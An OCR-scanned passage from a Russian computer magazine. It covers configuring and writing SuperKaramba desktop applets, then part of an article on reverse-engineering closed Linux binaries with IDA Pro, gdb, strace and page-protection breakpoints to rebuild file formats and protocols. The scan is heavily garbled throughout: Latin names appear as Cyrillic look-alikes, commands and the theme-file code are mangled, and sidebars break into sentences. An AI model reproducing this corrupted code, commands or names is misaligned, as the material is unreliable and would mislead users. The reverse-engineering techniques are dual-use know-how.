В самом правом окне отображается краткая информация о выбранном 
апплете, а иногда и маленький экранный снимок. Для каждого апплета 
выводится номер версии и рейтинг, выставленный пользователями. 
Обрати внимание, что окно имееттри вкладки. В «НідЬезІ: Раіесі » показа- 
ны апплеты, имеющие наибольший рейтинг, в «Мозі: боѵѵпіоасі» — на- 
иболее часто скачиваемые, а в «Ьаіезі» — недавно вышедшие версии. 
Щелкнув по «Оеіаііз», можно получить более детальную информацию. 
Нажатие на «Установить» закачает модуль. При этом файл скачивается в 
Дгтір и затем запускается из него. Но учти, что этот каталог после перезаг- 
рузки будеточищен и модуль придется скачиватьзаново, поэтому ктакому 
варианту следует обращаться только при ознакомлении с работой модуля. 
При постоянном использовании создай подкаталогзирегкагатЬа в/изг/ 
зЬаге/ксіе/аррз или в домашнем каталоге пользователя -ДксІе/зЬаге/аррз. 
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Далее, нажимаем «Локальный файл» и указываем на файл с расширени- 
ем вк 2 или іЬегте, принадлежащий выбранному апплету. А можно просто 
дважды щелкнуть по нему в файловом менеджере Копциегог — при этом 
стартуетБирегКагатЬа, которая загрузит его автоматически. Правда, при 
следующем запуске в списке известных апплетов его не будет и придется 
повторять все сначала. Еще одним вариантом является перечисление 
всех апплетов в строке запуска зирегкагатба: 



$ зирегкагатЪа кагзз-ОЗ.зкз 



Большую часть апплетов после запуска можно и даже нужно настраи- 
вать. Для этого щелкаем по нужному апплету правой кнопкой мыши и 
вызываем контекстное меню, в котором должен быть активным пункт 
«Настроить апплет». Чтобы расположить апплет в выбранном месте, 
просто схвати его мышкой и перетащи туда. Бывает, что это не удается :). 
Тогда в контекстном меню выбираем «Фиксированная позиция», чтобы 
изображение замка пропало, и после перемещения возвращаем замок на 
место. Крометого, в рабочем каталоге пользователя имеется подкаталог 
.зирегкагатЬа. В нем после настройки апплета создается файл, в котором 
описывается его местоположение на рабочем столе и иногда задаются 
некоторые настройки. Ручное редактирование этого конфига может 
понадобиться втом случае, если апплет вдруг спрячется за другой апплет 
или выскочитза рабочий стол и его не получится достать мышкой. Чтобы 
остановить отдельный апплет, выбери «Убрать апплет». 

О Полезные апплеты 

Описать все разнообразие существующих апплетов абсолютно невоз- 
можно, да и на сайте представлены далеко не все. Например, папогатЬа2 
— простой апплет, показывающий загрузку процессора, объем занятой 
оперативной памяти и зѵѵар, работу сетевого интерфейса. АѵѵСРІІ умеет 
выводить только информацию о загрузке процессора. Тот, кому этого будет 
недостаточно, может попробовать бІаззМопііог, который выдаетзначи- 
тельно больше информации: имя узла и информацию о системе, загрузку 
процессора и его температуру, использование памяти, работу сетевого 
интерфейса, втом числе скорость и количество отправленных и полу- 
ченных данных, свободное место на смонтированных разделах жесткого 
диска. В ВиіШАМоп (Виіісі ѴоигОѵѵпЗузіет Мопііог], который фактически 
состоит из двух апплетов, имеющих разный внешний вид, основнойупор 




> Окно ЗирегКагатЬа 



сделан на вывод информации отемпературе компонентов компьютера 
и скорости вращения кулеров. В апплете бопгтюп зузіет топііогтакже 
показывается напряжение, выдаваемое блоком питания. 

Есть целая группа апплетов, предназначенная для работы с различными 
сервисами интернета. Например, Фие-паШге, кроме системной информа- 
ции, вы вод ит да иные о наличии писем в РОРЗ или ІМАР почтовых ящиках. 
Длятого чтобы контролировать почтовые ящики, необходимоуказать их 
параметры в файлах таіІ5_рор3.рІ и ітар.рі, которые находятся в подка- 
талоге Фие-паіиге/ргод га тв. Например: 

ту $ассошік = 'ту ассошіР аР ТЦА.РМ' ; 
ту $8егѵегЫате = ' иа.Тт' ; 
ту $ЦзегЫате = 'дгтпсЗег' ; 
ту $Раззілгогс1 = ' ту_раззѵ\гогсІ ' ; 

Если для обмена сообщениями ты пользуешься Кореле, то обрати внима- 
ние на апплет 5коре1:е. Работать с такой парочкой приятнее. 

Тому, кто получает новости через каналы Р55, можно посоветовать кагвв. 
Для его работы нужен РуХМЦ который в КІІЬипіи устанавливается коман- 
дой зисіоарі-деі іпвіаіі руіЬоп-хтІ. Послеустановки и первого запуска 
апплета необходимо зайти в каталог~/.5ирегкагатЬа/каг55 и отредак- 
тировать файл іюесШзТхппІ, прописав в нем свои любимые Р55- каналы 
примернотак: 

<Теесі> 

<пате>31азкс!оР</пате> 

<1ШЬ>Тткр : //гзз . зіазксіор . огд/ЗІазксІоР/зІазксІоР 
</1ЖЬ> 

</Теес1> 

После этого требуется перезапуск апплета. 

А название ѴѴІкіресІіа зеагсЬ говорит само за себя. После его запуска до- 
статочно ввести интересующее слово в появившемся окне, чтобы открыл- 
ся веб-браузер с результатом поиска. Тот, кто часто заходит на ѴѴІкіресІіа, 
оценитудобство этого апплета. 

Популярностью пользуется апплет Ьіц и ісі ѴѴеаНлег [ ІідиісІѵѵеа1:Ьег.пе1: 1. 
он имеет наивысший рейтинг. После его установки необходимо 
выбрать в контекстном меню «Настроить апплет -> Сопбдиге іЬете», 
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> Прогноз погоды на рабочем столе 



Конкуренты 5ирегКагашЬа 

К слову сказать, у ЗирегКагатЬа есть конкурент, работающий в среде 
бКІОМЕ Оезкіор Арріеіз, — бОезкІеіз ( ѵѵѵѵѵѵ.дсіезкіеіз.огд ). Он облада- 
ет практически такими же возможностями, но неограничен работой 
только в одной среде. В настоящее время ООезкІеіз функционирует 
з большинстве современных рабочих столов ІІпіх, втом числе ТОЕ и 
Кбсе. Количество доступных десклетов здесь на порядок меньше, чем 
для ЗирегКагатЬа, но при этом и шансов запутаться меньше. Для того 
чтобы они были видны программе, их необходимо распаковать в каталог 
-./дсіезкІеіз/СопігоІз. 

Не стоитзабывать и о бКгеІІМ [ тетЬегз.бзІехігеппе.сот/изегз/Ыиѵѵ/ 
дкгеЦт/дкгеЦт.ЬітІ. ). который имеет большое количество встроенных 
функций мониторинга (диск, сеть, память, процессор, время, почта) и 
множество плагинов на самые разнообразныетемы. 

Для оконных менеджеров АЙегЗіер, ѴѴіпсІоѵѵМакег, ЕѴѴѴМ и ВІаскВох 
цок-приложения (боск-аррз) можно взять на сайте боскаррз.огд. Здесь 
6 категорий, в которых находится около 300 решений на все случаи 
жизни. 



а затем указать во вкладке «бепегаі» в выпадающем списке «Зеіесі 
Тгапзіаііоп» русский язык и выйти из настроек. После повторного захо- 
да все подсказки будут на русском. Теперь в поле «Единицы» активиру- 
ем «Использовать метрические», переходим во вкладку «Местность» 
и в строке поиска внизу вводим название своего города (на английс- 
ком). Затем находим его в результатах поиска, нажимаем «Добавить в 
список» и активируем месторасположение в «Сохраненные города». 
После перезапуска І_ідцісІ ѴѴеаіЬег будет показывать погоду на ближай- 
шие 5 дней. 

Обрати внимание, что еще есть вкладка «Веб-камеры». На рабочем 
столе очень хорошо смотрятся снимки космической тематики, взятые 
с сайта гісІіпдѵѵііЬгоЬоІз.огд . — нужно л ишь установить апплет Рісііпд 
ѴѴІіЬ РоЬоіз. 

Также есть апплеты, позволяющие управлять видео- и аудио проиг- 
рывателям и. Например, АтагоККопігоІ, который не только позволяет 
управлять одноименным музыкальным проигрывателем, но и выводит 
рейтинг песни, рисунок альбома и системную информацию. Есть 
решения и с более простой функциональностью, вроде Зітріагок или 
Міпі-Атагок. 



Не менее полезен апплет Ми Ш_5еагсЬ, который представляет собой интер- 
фейс к нескольким наиболее популярным настольным поисковым системам. 
Кроме одиночек, доступны и целые наборы апплетов. К примеру, Аегоб. 
Его отдельные окна в виде шариков выводят каждый свою информацию, 
при это мне кото р ы е а п п л еты дубл и ру ют друг друга . Та к, есть 2 а п п л ета , 
предоставляющих информацию о наличии почты на РОРЗ-серверах, но 
аегоб-плаіі-гпіпі отслеживает только один ресурс, а аегоѲ-плаіІ — два. Для 
редактирования параметров доступа открываем файл аегоб-плаіі(-тіпі). 
ру и указываем их в строках зегѵегі , зегѵег2, зегѵегпатеі , зегѵегпате2, 
изегпатеі , изегпате2, раззѵѵогсіі и раззѵѵогсі 2. Другим подобным 
набором является ТОЕ, который выводит в отдельных окнах сведения по 
загрузке системы, календарь, списокзарегистрировавшихся пользовате- 
лей, процессы, заметки, сетевую статистику и многое другое. Для запуска 
сразу всех модулей достаточно использовать файл аІІ.іЬете. 

□ Создаем свою тему 

Владея простейшими навыками программирования, ты легко можешь 
создать свой апплет самостоятельно. Подробности ищи в докумен- 
тации проекта; также есть неплохой документ на русском языке — 
Н0ѴѴТ0_5ирегКагатЬа ( ги.депІоо-ѵѵікі.сот/НОѴѴТО ЗирегКагатЬа ). 

В принципе, ничего сложно здесь нет, просто нужно время и желание. 
Для удобства рекомендую скачать с сайта проекта файл-шаблон 
іетріаіе.ру ( пеісІгадоп.зЕпеіАетрІаІе.ру ) или использовать один из го- 
товых апплетов. Переименовываем его в туіЬете.іЬете и открываем в 
редакторе. Апплет может содержать следующие записи: 

• кагатба — определяет внешний вид интерфейса, тему, размер, 
фоновые рисунки, шрифты, области, позволяющие вызвать приложение 
нажатием мышки; 

• зепзогз — набор предустановленных датчиков, выводящих информа- 
цию о системе (загрузка процессоров, память, сеть), запущенных 
приложениях; 

• гшеіегз — автоматически обновляющиеся индикаторы, выводящие 
значения датчиков. Для удобства однотипные индикаторы рекомендуется 
разбивать на группы. 

Крометого, ЗирегКагатЬа имеет большое количество функций, неплохо 
помогающих в настройке. 

Итак, открываем свой любимый редактор и конфигурируем. Помни, мы 
имеем дело с РуіЬоп, который не терпит лишних пробелов и табуляций. 
Нумерация строк приведена исключительно для удобства разбора и 
более никакой роли не играет: 
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I. кагашЬа х=0 Ъоккот=кгие ѵ\/=12 0 к=140 Іоскескіаізе 
іпкегѵа1=2000 сіеіаиік Топк = " Запз " ТопкзІ2е=10 
зкас!оѵ\/=2 со1ог=255 , 255 , 255 

2 . <СК01ІР> х=10 у =10 

3. кехк х=12 у=0 зепзог=кіте 1опкзІ2е=12 іогтак= "кк : 
тт : з з " 

4. кехк х=12 у=15 зепзог=кіте іогтак= " скМ сісі . ММ . уууу " 

5. сііскагеа х=0 у=0 ѵг= 120 к=34 опс1іск= "хкегт" 

6. </СКОІІР> 

7. <СКОІІР> х=10 у =5 0 

8. ДехЪ х=12 у=0 ѵа1ие="МЕМ" 

9. Ъехк х=45 у=0 зепзог=тетогу 1огтак= " %1тЬ Мб " 

10. кехк х=12 у=15 ѵа1ие= "СРЮ " 

II. СКАРН х=45 у=15 ѵ\/=7 0 к=12 со1ог=255 , 255 , 255 
роіпкз=100 зепзог=сри 

12. кехк х=12 у=30 ѵа1ие="Ш" 

13. кехк х=45 у=30 к=12 ™=70 со1ог=255 , 255 , 255 
роіпкз=100 зепзог=пекѵ\гогк кеѵісе= "рррО " 1огтак= " %іп 
кв/з" іпкегѵа1=1000 кесіша1з=1 

14. кехк х=12 у=40 ѵа1ие= "ОНТ" 

15. кехВ х=45 у=40 к=12 ™=70 со1ог=255 , 255 , 255 
роіпкз=100 зепзог=пекѵ\гогк с!еѵісе= "ррр0>> 1огшак="%оик 
кВ/з" іпкегѵа1=1000 кесіта1з=1 

16. </СКОНР> 

Теперь разберем пример. В общем случае любой апплет может состоять из од- 
ной первой строки. Тогда будет выведено пустое окно шириной 1 20 и высотой 
140 пикселей; интервал обновления для всехэлементовсоставит2000 мс;для 
представления информации будет применяться шрифтЗапз белого цвета вы- 
сотой 10. Для группировки отдельных элементов используются тэги <ѲР01ІР>, 
</6Р01ІР>. Такой подход у прощает со в местное перемещение, форматирова- 
ние и оформление. Можно задействовать вложенные группы. Параметры х и 
упри объявлении группы указывают на горизонтальное и вертикальное поло- 
жение ее верхнего угла. Чтобы выделить группу, можно использовать рисунок, 
изображающий ее назначение и подключающийся такой конструкцией: 

ішаде х=5 у =5 ракк= " зузкет. рпд" 

В качестве альтернативы подключают заготовленный файл темы: 

Ъкеше ракк=1 . ккеше 

В строках 3 и 4 вызываем датчик б те, показывающий информацию о сис- 
темном времени. Для форматирования вывода любого датчика использу- 
ется функция Іогтаб Датчик имеет несколько параметров Ьгтаб каждый 
из которых выводит результат по-разному. В нашем случае в первой строке 




> Все о системе 



время будет представлено в формате «14:13:09», а ниже будет идти дата: 
«Вое 03.03.2007». В строке 5 показан вариант реакции апплета на щелчок 
мышкой поуказанной области (если ІоскесІ=1 : аІзе, то необходим двойной 
щелчок). В нашем примере будетзапущен хіегт, ноэто может быть любой 
исполняемый файл или скрипте некоторыми параметрами. В группе 7/16 
в поле апплета будет показываться системная информация. Строки 8, 9, 

1 2 и 14 вы ведут текст, который будет использован для заголовка сенсора. 
Аследующие строки активируютуже сами детекторы. В ЗирегКагатЬа 
имеются следующие детекторы: 

• тегтюгу — выводит информацию о доступной памяти и свап; 

• сри — показываетза грузку процессора, поддерживаются многопроцес- 
сорные системы; 

• сіізк — информация о разделах жесткого диска и смонтированных сете- 
вых ресурсах; 

• пеб/ѵогк — информация о работе сетевых интерфейсов; 

• поаіип, хттз — если на компьютере запущен ЫоаШп (или хттз), такой 
датчик будет выводить информацию о его работе (за гол о во к те кущей 
песни, ее продолжительность, автор и прочее); 

• ргодгат — информация со стандартного вывода указанной программы 
(ргодгат="ѵѵЬоаті»); 

• зепзо г — этот датчик покажет информацию отемпературе, вольтаже, 
скорости вращения кулеров ит.д.; 

• іехібіе — вывод в поле указанного файла (зепзог=іехкіІе раіЬ=Мс/ 
раззѵѵб); 

• бте — дата и время; 

• ирбте — время непрерывной работы системы. 

Выводлюбого датчика может быть в текстовом виде (іехі) , либо для его 
оформления можно использовать один из индикаторов. Так, индика- 
тор ѲРАРН в строке 1 1 будет показывать загрузку процессора в виде 
непрерывной линии. При применении индикатора ВАР информация будет 
выводиться в виде строки статуса. Полоса рисуется с помощью картинки, 
переданной параметром рабъ 

Ьаг х=0 у=0 ъ/=10 к=2 00 ѵегкіса1=кгие ракк= " ітд . рпд" 
зепзог=сри 

Индикатор I МАО Е покажет изображение в указанной позиции. Само изобра- 
жение можно соединять с датчиком, либо просто выводить какукрашение. 
Апплет А-РОТО, показывающий фотографии из указанного каталога прямо на 
рабочем столе, для вывода использует именно ІМА6Е. Примернотак: 

ішаде х=10 у=10 іпкегѵа1=4000 зепзог=ргодгаш 
ргодгаш= "рісЪигез .рі" 

Как видишь, ничего сложно здесь нет. Требуется лишьжелание. Надеюсь, 
ЗирегКагатЬатебе понравится. ~і~ 
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Рост коммерческого программного обеспечения под Ілпих, распространяющегося без исходных текстов, 
вызывает озабоченность сообщества Ореп Зоигсе, заинтересованного в создании открытых версий про- 
приетарных продуктов. Основная сложность клонирования этих проектов состоит отнюдь не в кодиро- 
вании, а в расшифровке протоколов обмена и форматов файлов. Эту часть работы берут на себя хакеры, 
свободно владеющие отладчиком, разбирающиеся в дизассемблировании и знающие массу эффектив- 
ных приемов реверсинга. О некоторых из таких приемов здесь и пойдет речь. 



ротивопоставляя Ыпих продукции МісговоЮ многие почему-то 
забывают, что, помимо операционныхсистем, МісговоЕ выпус- 
каети программное обеспечение прикладного типа (например, 
тотже М5 ОНісе). И если біпих станет необычайно популярной, 
то Місгозоб: (а вместе с ней и другие производители) начнет переносить свои 
продукты и на эту ось, только исходных текстов нам, естественно, никто не пре- 
доставит. Сейчас мы имеем свободную операционную систему со свободным 
ПО и небольшой примесью за крытых программ (например, ІпіеІС++,5куре 
еіс), ноуже через нескольколетона может превратиться в псевдосвободную 
ОСсзакрытыми драйверами, закрытым ПО и незначительной примесью от- 
крытых программ. Это дискредитирует саму идею ОрепЭоигсе и отрицательно 
повлияет на безопасность, поскольку закрытое ПО можетсодержатьвсебечто 
угодно: от непреднамеренных ошибок до умышленных за кладок. 

М іеговой уже заключила договор с ІЧоѵеІІ о переносе М5 Оббісе на 5и5Е, и 
это только начало. За Місгозо^ последуют и остальные. Чтобы предотвра- 
тить вторжение коммерческого ПО в плоскость свободной оси, необхо- 
димо создать некоммерческие клоны всех закрытых программ. Для этого 
нужно распотрошитьдвоичные файлы и вытянуть из них всютребуемую 
информацию о форматах файлов/протоколов, на основании которой коде- 
ры создадут совместимый свободный продукт (он же клон). 

□ Чем мы будем действовать 

Основным инструментом хакера является дизассемблер. Лучшим дизас- 
семблером был и остается ЮА Рго, поддерживающий ЕбР-формат, рас- 
познающий большое количество библиотечных функций и обладающий 



замечательной системой навигации по исследуемому файлу. Короче 
говоря, равных ЮА Рго нет. Остальные дизассемблеры плетутся где-то в 
хвосте и годятся лишь для анализа небольших программ. 

Техника дизассемблирования двоичных файлов под Еіпих мало чем 
отличается отанализа ѴѴІпсІоѵѵз-файлов, только вместо АРІ-функций мы 
будем иметь дело с функциями стандартных библиотек. Системные вызовы 
встречаются намного реже, так как они по-разному реализованы в различ- 
ных версиях Ыпих и производитель, заботящийся о совместимости, ни за 
что не будет к ним прибегать. Упаковщиков исполняемых файлов под Еіпих 
практически нет, и большинство коммерческих программ распространяет- 
ся в неупакованном виде, что значительноупрощаетанализ. Однако боль- 
шинство — это еще не все, и тотже Экуре активно использует многоуров- 
невую динамическую шифровку кода, на снятие которой уходит огромное 
количество времени и пива (подробнее отехнике борьбы супаковщиками 
можно прочитать в подборке статей пегиті.огд.ги/ипраск-раск.гір ). 
Инструмент номер два — отладчик, в роли которого обычно выступает дбЬ, 
хотя в некоторых случаях удобнее пользоваться отладчиком, интегриро- 
ванным в ЮА Рго. И тот, и другой основаны на системной функции рігасе, 
с которой разработчики защит уже давно научились бороться и против 
которой существует целый легион эффективных антиотладочных при- 
емов. Поэтому в хакерском арсенале должны быть и другие отладчики, не 
использующие рігасе, например АбО, Ііпісе (желающих узнать подробнее 
о бтих-отладчиках и антиотладочных приемах мы отсылаем к подборке 
статей: пеги ті.огд.ги/Ііпих-сІеЬид-раск.гір . а также к мыщъх'иной книге 
«Техника отладки программ без исходныхтекстов»). 
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С перехватом системных вызовов неплохо справляются штатные утилиты 
Ігизз и кігасе, первая из которых работает в прикладном режиме, вторая 
— на уровне ядра. Для сбора сетевого трафика, как правило, используется 
Ісрбшпр, входящий в комплект поставки большинства дистрибутивов. 

О Как мы будем действовать 

Не стоит пытаться дизассемблировать приложение, весящее несколько 
десятков мегабайт, от начала и до конца. Интерфейсную часть и прочий 
тупой код можно переписать с нуля и без дизассемблера. Тоже самое от- 
носится ко многим стандартным алгоритмам, типа быстрого дискретного 
преобразования Фурье. 

Достаточно просто понять, что делаетта или иная функция, а ужза 
конкретной реализацией дело не станет (существуют десятки алгоритмов 




> ОсІЬ — основной отладчик под І_іпих 



нагрузки, но неизбежно сохраняющемся в открытом клоне при построч- 
ном переносе функций, что является достаточно убедительным доказа- 
тельством плагиата. Обнаружить «водяные знаки» возможно только после 
отождествления алгоритма функции. Не стоит надеяться, что это будет 
тривиальный мусор в стиле МОѴ ЕАХ.ЕСХ/МОѴ ЕСХ.ЕАХ, скорее всего, 
производитель использует избыточные преобразования данных, которые 
в грубом приближении выглядят так: х=б(у)/1 . Очевидно, что операция 
деления на единицу лишняя, но для ее исключения требуется понять, что 
это именно деление, а не что-то другое. 

Существуеттри пути отождествления функций: а) анализ алгоритма; б) 
сопоставление обрабатываемыхданныхс возвращенным результатом; 
в) уникальные константы. Ну, с анализом алгоритма все понятно. Если мы 
знаемтотили иной алгоритм (неважно чего: быстрой сортировки, обхода 



«МОЖНО СКОЛЬКО УГОДНО КОВЫРЯТЬСЯ В ДИЗАССЕМБ- 
ЛЕРНОМ ЛИСТИНГЕ, НО ЭТО НИ НА ЙОТУ НЕ ПРИБЛИЗИТ 
НАС К РАЗГАДКЕ, КАКУЮ ЦЕЛЬ ПРЕСЛЕДУЮТ ВСЕ ЭТИ 
ОПЕРАЦИИ И КАКОЙ СМЫСЛ НЕСЕТ ПРЕОБРАЗОВАНИЕ 
МАССИВА ЧИСЕЛ X В У» 



Фурье-преобразования, заточенные под различныетипы процессоров, и 
создатели открытого клона могут использовать более компактный/быст- 
родействующий вариантбез нарушения совместимости). 

Можно выделить два уровня реконструкции программы: микро- (алгорит- 
мы работы отдельных функций) и макро- (назначение функций и анализ 
связей между ними). Каждый изуровней имеетсвою специфику, которая 
сейчас и будет рассмотрена. 

О Реконструкция формата на микроуровне 

Техника отождествления функций требует определенной математичес- 
кой подготовки и программистского опыта. Знакомые функции зачастую 
распознаются с первого взгляда, незнакомые не распознаются вообще. 
Можно сколько угодно ковыряться в дизассемблерном листинге, но это 
ни на йоту не приблизит нас к разгадке, какую цель преследуют все эти 
операции и какой смысл несет преобразование массива чисел X вУ. В 
этом случае остается только одно — построчно переписать код функции с 
ассемблера на Си (или на любой другой язык высокого уровня). При этом 
мы теряем шанс выбрать более эффективную реализацию и подходим 
копасной черте, отделяющей независимую свободную реализацию от 
воровства двоичных модулей. И хотя код, сгенерированный компиля- 
тором, будетзначительно отличаться отдизассемблируемого кода, нас 
могут поймать на «водяныхзнаках» — битту-коде, не несущем полезной 



дерева, вычисления квадратного корня), то сможем отождествить его на 
любом языке: хочешь — на Паскале, хочешь — на ассемблере. Проблема 
в том, что никакой отдельно взятый человек не в состоянии удержать в 
голове всеалгоритмы (или хотя бы самые популярные из них), особенно 
если дело касается математики, поэтому в хакерской команде должны быть 
узкие специалисты по криптографии, сжатию цифрового аудио/видео и т.д. 
Для ускорения (и упрощения) анализа широко используется метод черного 
ящика: вместо того чтобы изучать код функции, мы перехватываем пере- 
даваемые ей данные и смотрим на возвращаемый результат. Сопоставляя 
первое со вторым, пытаемся постичь суть. Алгоритмы поиска или сортиров- 
ки распознаются сразу же. С упаковкой/распаковкой дела обстоят несколько 
сложнее. Сам факт упаковки/распаковки обнаруживается с первого взгля- 
да, но вот их алгоритм остается загадкой. Если только функция не работает 
собщепринятыми форматамитипа дгір, для создания совместимого клона 
необходимо полностью реконструировать ее алгоритм. 

Ксчастью, многие алгоритмы оперируютуникальными константами — 
стандартные полиномы позволяют отождествить методику шифрования/ 
расчета контрольной суммы буквально за несколько секунд, а референсные 
матрицы квантования легко разоблачают аудио-/видеокодеки, причем 
операция отождествления легко поддается автоматизации. В частности, для 
ЮА Рго существует несколько хороших плагинов, распознающих большое 
количество алгоритмов шифрования (их можно найти на ѵѵѵѵѵѵ.ібарго.сот ). 
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> Консольная версия ЮА Рго под І_іпих 




С реконструкцией форматов файлов и протоколов обмена все обстоит 
и проще, и сложнее. Проще потому, что реконструкция базовой 
структуры формата не требует никаких специальных знаний и вполне 
довольствуется минимальными навыками владения отладчиком/ди- 
зассемблером. Сложнее потому, что на низком уровне практически 
любой формат включает в себя алгоритмы шифрования, подсчета 
контрольной суммы, сжатия (с потерями или без). То есть если сделать 
свой парсер закрытого формата сможет и начинающий хакер, то 
написание совместимого открытого клиента потребуетусилий целой 
команды хакеров. 

О Реконструкция формата на макроуровне 

Запустив ісрбитр (или любой другой снифер, по вкусу), мы сможем 
перехватывать сообщения, которыми обмениваются клиент и сервер, 
наблюдая, как происходят процедуры регистрации/авторизации, переда- 
чи данных и т.д. Аналогичным образом обстоят дела и с реконструкцией 
форматов файлов. Перехватсистемных вызовов открытия, позицио- 
нирования, чтения и записи в файл несет в себе огромное количество 
информации и разбивает монолитную структуру файла на составляющие 
его кирпичики, однако внутренняя структура кирпичиков на этом этапе 
остается загадкой. 



В отладчике мы устанавливаем точки останова на все функции ввода/ 
вывода (как файловые, так и сетевые) и ведем тотже протокол, который 
создают Ігивв и кіхасе, стой лишь разницей, что мы ставимточки останова 
на блоки памяти, возвращенные функцией геаб. При первом же обраще- 
нии к ним отладчик всплывает, позволяя нам «запеленговать» искомую 
функцию. На первом этапе мы лишь записываем адреса функций -обра- 
ботчиков и наблюдаем за возвращаемыми ими данными, устанавливая 
на них дополнительныеточки останова и пытаясь понять, чем именно 
они занимаются (в частности, функции-распаковщики распознаются 
практически сразу). 

Это довольно кропотливая работа, требующая большой усидчивости и 
хорошей памяти (не оперативной), позволяющей удержать в голове мно- 
жество последовательностей вызова вложенных друг в друга функций, в 
которых поначалу не видно никакой структуры. Но по мере продолжения 
исследований между функциями образуются прочные мосты, через кото- 
рыетранспортируются данные вполне предсказуемыми маршрутами. 
Основная проблема втом, что аппаратныхточекостанова на х86 всего 
четыре и максимальная длина каждой из них составляетдвойное слово. 
Аппаратныхточекостанова катастрофически не хватает, а невозможность 
установить точку останова на регион памяти вгоняетхакеров в глубокую 
тоску, граничащую с суицидом. Можно, конечно, попробоватьустановить 



«ОСНОВНАЯ ПРОБЛЕМА В ТОМ, ЧТО АППАРАТНЫХ ТОЧЕК 
ОСТАНОВА НАХ86 ВСЕГО ЧЕТЫРЕ И МАКСИМАЛЬНАЯ 
ДЛИНА КАЖДОЙ ИЗ НИХ СОСТАВЛЯЕТ ДВОЙНОЕ СЛОВО» 



Допустим, программа читает первые N байт от начала файла, затем 
прыгает по смещению X, считывает еще К байт, прыгает по смеще- 
нию У... Что это может означать? Если формат не зашифрован/упа- 
кован, то, скорее всего, где-то в заголовке содержится ссылка на 
индексы (смещение позиции X, задаваемое, как правило, л ибо от 
начала файла, л ибо от конца заголовка), где лежат указатели на 
подчиненные структуры данных, одна из которых и расположена 
по смещению У (здесь может находиться текст, подготовленный к 
выводу на экран). 

Для реконструкции неупакованного/незашифрованного файла вполне 
достаточно утилитігивв, кігасе и Ьех-редактора. Все индексы и данные 
там будут лежать в открытом виде как есть, и, располагая одной л ишь 
последовательностью вызовов веек и геаб, несложно разобраться, 
где какое поле лежит и чему принадлежит. Однако открытые форматы 
встречаются достаточно редко, поэтому к Ьех-редактору добавляется 
дизассемблер и отладчик. 



точку останова на первый байт данных, возвращенных функцией геаб, 
надеясь нато, что разбор данных происходите самого начала. В боль- 
шинстве случаев именнотак все и бывает, однако никаких гарантий этого 
у нас нет. Ктомуже некоторые программы сразу считывают весь файл (или 
все служебные структуры файла) в память и в дальнейшем работаютс ним 
напрямую, не обращаясь к веек. 

При исчерпании аппаратныхточекостанова отладчикдбЬ предлагает 
установить программную (их количество не ограничено), однако при этом 
он переходитв режим пошагового исполнения программы, проверяя 
каждую машинную инструкцию, в результате чего скорость выполнения 
программы катастрофически замедляется. Для анализа дисковых файлов 
это, в общем-то, некритично, а вот при реконструкции протокола обмена 
время прогона очередного куска под отладчиком может превысить время 
ожидания сервера. При этом нас вышибут потайм-ауту, вынуждая при- 
обретать более быстрый процессор или... эмулировать ап па ратные точки 
останова путем выставления атрибутов страниц в РП0Т_Ы0МЕ с помощью 
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функции тргоіесі:, которую можно 
вызывать непосредственно из- 
под дсІЬ (кслову, дсІЬ, в отличие 
отЭоШСЕ, позволяет вызывать 
любые функции). При обраще- 
нии кстранице памяти отладчик 
всплывает по исключению типа 
нарушения доступа, и нам остает- 
ся только записать адрес дерзнув- 
шей инструкции, вернуть атрибуты 
на место, выполнить инструкцию 
(или даже всю функцию целиком) 
и вызвать тргоіесі: еще раз, за- 
бирая атрибуты обратно. При этом 
отладчик, естественно, должен 
быть настроен так, чтобы погло- 
щать сигнал о нарушении доступа, 
не передавая его прикладной 
программе. Отом, какэто сделать, 
рассказано в статье, входящей в 
Ііпих-сІеЬид-раск. 2 Ір. 

Этот прием не накладывает никаких ограничений на количествоточек 
останова, требуя лишь, чтобы их размер был кратен длине одной страницы 
памяти. Это достаточножесткоетребование. Ачто делать, если намтребу- 
ется установить точку останова на ЗООЬ байт памяти по адресу 80481 23Н? 
Очень просто! Ставим точку останова на страницу 80480006, а затем 
вручную отбрасываем ложные срабатывания, находящиеся вне адресов 
8048123И -8048423И (еслиже регион памяти, на который необходимоус- 
тановитьточку останова, пересекает границу страниц памяти, приходится 
отнимать атрибуты доступа сразу у двух страниц). При желании эту работу 
легко автоматизировать, поскольку дбЬ поддерживает довольно развитую 
систему макросов, на которых можно написать практически все что угодно. 
Таким образом, в нашем распоряжении окажется списокадресов, откуда 
происходит вызов функций геаб и веек, а также списокадресов, где осу- 
ществляется обработка данных. Исследуя окрестности этих адресов в ди- 
зассемблере, мы сможем реконструировать протокол обмена/формат файла 
за достаточно продолжительное, но все-таки конечное время. Причем эту 
фазу работы легко распараллелить между несколькими участниками, ведь 
на макроуровне связи между функциями уже ясны, итеперь пришла пора 
рыть в глубь, анализируя алгоритм работы каждой функции в отдельности. 

О Вертикальный лимитпределов и ограничений 

Полная реконструкция формата файла/протокола обмена на основе 
наблюдений за живым обменом с помощью Ігивв/кігасеАсрсІитр 
невозможна в принципе, поскольку далеко не в каждом файле (сеансе 
обмена с сервером) задействуются все поля/команды. Открытый клон, 
созданный на основетаких данных, будет падать при открытии каждого 
І\Гго файла или впадать в ступор при получении отсервера непонятного 
сообщения. Ну и куда это годится? Пользователи тут же взвоют и расста- 
нутся с открытым клоном в пользу оригинального продукта, даже если 
клон дешевле/удобнее. 

Поэтому необходимо пройтись по всему двоичному коду исследуе- 
мой программы, отыскивая по перекрестным ссылкам функции-об- 
работчики, которые не вызывались в текущем сеансе, но все -таки 
присутствуют и обрабатывают определенные поля файла/команды 
протокола. Часть из них вообще никогда не встречается (устарела 
или не реализована на серверной стороне), а часть относится кэк- 



зотическим породам, попадающимся только в определенных файлах 
(например, «японской» версии, поддерживающей особенности их 
алфавита). Дизассемблировать такие функции, неимяоб раз ца фай- 
ла, на котором их можно было бы протестировать, — это как стрелять 
в темноте наугад, но кто говорит, что быть хакером легко? Вот почему 
многие форматы/протоколы обмена реверсятся годами, а протокол 
обмена 5 куре до сих пор реконструирован только в самых общих 
чертах, несмотря на то что его грызут многие хакерские коллективы, 
пытающиеся использовать Экуре-сеть для распространения червей, 
дронови прочей живности. 

Самое неприятное, что назначение некоторых незадействованных 
в да иной версии программы функций невозможно выяснить путем 
отладки/дизассемблирования, поскольку их алгоритмы могутбыть 
завязаны на обрабатываемые данные, образцов которых в нашем 
распоряжении нет и не будет. Не будет до тех пор, пока производитель 
не выпустит новую версию, полностью совместимую со старой. Этого 
нельзя сказать про наш свободный клон (если, конечно, не прибегнуть 
к построчному переносу всех незадействованных функций, но и в этом 
случае мы не сможем их отладить, а переписать несколько тысяч строк 
кода без ошибок — мало осуществимо, даже при самой тщательной 
